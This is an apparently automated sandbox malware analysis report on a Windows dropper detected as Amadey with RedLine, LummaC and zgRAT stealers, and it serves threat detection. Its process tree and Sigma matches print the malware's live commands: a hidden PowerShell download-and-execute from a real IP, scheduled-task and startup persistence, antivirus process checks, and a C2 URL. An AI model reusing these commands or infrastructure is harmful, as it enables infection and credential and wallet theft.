
Windows Analysis Report
random.exe

Overview

General Information

Sample name: random.exe
Analysis ID: 1632643
MD5: 177de0a157b6aa0663ffae3821f3b026
SHA1: 82b14ddc83e589e0efad23054271d7c9307e5adc
SHA256: dc25d718f31abfb22d767a38383cc4534ecec474e88e9b84b9e437fb97fd5017
Tags: 092155, Amadey, exe, user-aachum

Detection

Amadey, LummaC Stealer, PureLog Stealer, RedLine, zgRAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Powershell download and execute file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadey's Clipper DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected RedLine Stealer
Yara detected obfuscated html page
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Creates HTA files
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • random.exe (PID: 1296 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 177DE0A157B6AA0663FFAE3821F3B026)
    • cmd.exe (PID: 2288 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1452 cmdline: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 5428 cmdline: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 5708 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE (PID: 7236 cmdline: "C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
          • rapes.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
            • ReK7Ewx.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Local\Temp\10141760101\ReK7Ewx.exe" MD5: 81791C3BF6C8D01341E77960EAFC2636)
              • cmd.exe (PID: 5444 cmdline: "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • expand.exe (PID: 2976 cmdline: expand Ae.msi Ae.msi.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
                • tasklist.exe (PID: 1040 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 1236 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • tasklist.exe (PID: 3696 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
                • findstr.exe (PID: 6096 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • cmd.exe (PID: 1552 cmdline: cmd /c md 789919 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • extrac32.exe (PID: 4024 cmdline: extrac32 /Y /E Deviation.msi MD5: 9472AAB6390E4F1431BAA912FCFF9707)
                • findstr.exe (PID: 4500 cmdline: findstr /V "Brian" Challenges MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
                • cmd.exe (PID: 4412 cmdline: cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • cmd.exe (PID: 2536 cmdline: cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • Occupation.com (PID: 2920 cmdline: Occupation.com q MD5: 62D09F076E6E0240548C2F837536A46A)
                  • cmd.exe (PID: 3836 cmdline: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • schtasks.exe (PID: 7480 cmdline: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
                  • cmd.exe (PID: 1464 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • choice.exe (PID: 5880 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
            • V0Bt74c.exe (PID: 7856 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • V0Bt74c.exe (PID: 3028 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • V0Bt74c.exe (PID: 4860 cmdline: "C:\Users\user\AppData\Local\Temp\10141770101\V0Bt74c.exe" MD5: 019B0EE933AA09404FB1C389DCA4F4D1)
              • WerFault.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7856 -s 764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • mshta.exe (PID: 1992 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 5740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6616 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • rapes.exe (PID: 7520 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 7240 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 7684 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • rapes.exe (PID: 1920 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 5B1DBCCB1977E33FAE7E0EFA78E96B49)
  • wscript.exe (PID: 1376 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale, apparently as a standalone product ($100/$150 depending on the version) or on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, including details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer component which targets browser information and crypto wallets. It usually spreads by USB or by phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mAtJWNv[1].exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Users\user\AppData\Local\Temp\10141820101\mAtJWNv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta | JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security
Source | Rule | Description | Author
0000000D.00000002.1315277823.0000000000031000.00000040.00000001.01000000.00000011.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000D.00000003.1272817646.0000000004830000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
00000033.00000002.3513079723.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
0000000B.00000002.1267517499.0000000000311000.00000040.00000001.01000000.0000000E.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
0000000C.00000002.1304814909.0000000000311000.00000040.00000001.01000000.0000000E.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
Source | Rule | Description | Author
51.2.V0Bt74c.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
49.2.V0Bt74c.exe.3549550.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
51.2.V0Bt74c.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
amsi32_5708.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi64_5740.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

System Summary

Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 2288, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ProcessId: 5428, ProcessName: mshta.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3836, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F, ProcessId: 7480, ProcessName: schtasks.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\Desktop\random.exe", ParentImage: C:\Users\user\Desktop\random.exe, ParentProcessId: 1296, ParentProcessName: random.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ProcessId: 5428, ProcessName: mshta.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1048, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js", ProcessId: 1376, ProcessName: wscript.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5708, TargetFilename: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE
Source: Process started; Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5428, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'WCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 5708, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2288, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn zhvFsmabDCl /tr "mshta C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 1452, ProcessName: schtasks.exe
